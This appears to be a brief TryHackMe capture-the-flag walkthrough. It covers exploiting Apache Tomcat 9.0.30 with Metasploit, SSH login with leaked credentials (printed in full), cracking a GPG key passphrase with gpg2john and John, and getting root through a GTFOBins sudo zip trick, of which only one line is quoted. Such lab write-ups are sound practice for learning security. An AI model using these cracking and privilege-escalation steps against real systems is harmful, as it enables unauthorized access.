Hmm I can see this too.

Hmm I just searched for a exploit of # Apache Tomcat/9.0.30. Hoping if we find anything special and it worked.

So it is metasploit exploit. I searched on msfconsole for making it simple.

And exploited it.
Hmm we got the username and password. Hmmm. skyfuck:8730281lkjlkjdqlksalks

And it worked on ssh.

Now lets do privelege escalation. And found few things.

Hmmmm. Now we can import that private gpg key in tryhackme.asc. gpg --import tryhackme.asc After this, we can check this. gpg --list-secret-keys And do this. gpg --decrypt credential.pgp

And it should be decrypted but there is a twist.

Its asking for a passphrase. Hmmmm.

Then,I downloaded that both file to my host. I used john to get hash and crack passphrase. gpg2john tryhackme.asc > hash.txt

And simply cracked with john. john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
alexandru

And we decrypted that credential.pgp.

Hmm now lets try to become root. And we can see something.

Now I immediately goes to. [[https://gtfobins.github.io/gtfobins/zip/#sudo]]

And got this.

If the binary is allowed to run as superuser by `sudo`, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

    sudo rm $TF

And exploited this and got root.

And done.
